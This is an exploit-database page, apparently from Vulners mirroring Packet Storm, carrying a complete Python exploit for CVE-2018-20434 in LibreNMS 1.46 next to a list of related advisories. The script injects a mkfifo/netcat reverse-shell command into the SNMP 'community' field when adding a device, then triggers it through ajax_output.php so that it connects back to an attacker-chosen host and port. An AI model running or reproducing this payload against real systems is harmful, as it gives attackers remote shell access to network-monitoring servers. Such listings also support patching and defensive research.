Lucene search
K

LibreNMS 1.46 addhost Remote Code Execution

🗓️ 28 Jun 2019 00:00:00Reported by AskarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 68 Views

LibreNMS 1.46 addhost Remote Code Execution CVE-2018-20434 Ubuntu 18.0

Related
Code
ReporterTitlePublishedViews
Family
0day.today
LibreNMS - addhost Command Injection Exploit
5 Jun 201900:00
zdt
0day.today
LibreNMS 1.46 - addhost Remote Code Execution Exploit
30 Jun 201900:00
zdt
ATTACKERKB
CVE-2018-20434 - LibreNMS Addhost Command Injection
24 Apr 201900:00
attackerkb
Circl
CVE-2018-20434
4 Jun 201917:58
circl
Check Point Advisories
LibreNMS addhost Command Injection (CVE-2018-20434)
28 Nov 202100:00
checkpoint_advisories
CVE
CVE-2018-20434
24 Apr 201920:05
cve
Cvelist
CVE-2018-20434
24 Apr 201920:05
cvelist
Exploit DB
LibreNMS - addhost Command Injection (Metasploit)
5 Jun 201900:00
exploitdb
Exploit DB
LibreNMS 1.46 - 'addhost' Remote Code Execution
28 Jun 201900:00
exploitdb
exploitpack
LibreNMS 1.46 - addhost Remote Code Execution
28 Jun 201900:00
exploitpack
Rows per page
`#!/usr/bin/python  
  
'''  
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution  
# Date: 24/12/2018  
# Exploit Author: Askar (@mohammadaskar2)  
# CVE : CVE-2018-20434  
# Vendor Homepage: https://www.librenms.org/  
# Version: v1.46  
# Tested on: Ubuntu 18.04 / PHP 7.2.10  
'''  
  
import requests  
from urllib import urlencode  
import sys  
  
if len(sys.argv) != 5:  
print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"  
sys.exit(0)  
  
# target (user input)  
target = sys.argv[1]  
  
# cookies (user input)  
raw_cookies = sys.argv[2]  
  
# remote host to connect to  
rhost = sys.argv[3]  
  
# remote port to connect to  
rport = sys.argv[4]  
  
# hostname to use (change it if you want)  
hostname = "dummydevice"  
  
# payload to create reverse shell  
payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport)  
  
# request headers  
headers = {  
"Content-Type": "application/x-www-form-urlencoded",  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"  
}  
  
# request cookies  
cookies = {}  
for cookie in raw_cookies.split(";"):  
# print cookie  
c = cookie.split("=")  
cookies[c[0]] = c[1]  
  
  
def create_new_device(url):  
raw_request = {  
"hostname": hostname,  
"snmp": "on",  
"sysName": "",  
"hardware": "",  
"os": "",  
"snmpver": "v2c",  
"os_id": "",  
"port": "",  
"transport": "udp",  
"port_assoc_mode": "ifIndex",  
"community": payload,  
"authlevel": "noAuthNoPriv",  
"authname": "",  
"authpass": "",  
"cryptopass": "",  
"authalgo": "MD5",  
"cryptoalgo": "AES",  
"force_add": "on",  
"Submit": ""  
}  
full_url = url + "/addhost/"  
request_body = urlencode(raw_request)  
  
# send the device creation request  
request = requests.post(  
full_url, data=request_body, cookies=cookies, headers=headers  
)  
text = request.text  
if "Device added" in text:  
print "[+] Device Created Sucssfully"  
return True  
else:  
print "[-] Cannot Create Device"  
return False  
  
  
def request_exploit(url):  
params = {  
"id": "capture",  
"format": "text",  
"type": "snmpwalk",  
"hostname": hostname  
}  
  
# send the payload call  
request = requests.get(url + "/ajax_output.php",  
params=params,  
headers=headers,  
cookies=cookies  
)  
text = request.text  
if rhost in text:  
print "[+] Done, check your nc !"  
  
  
if create_new_device(target):  
request_exploit(target)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.71487
68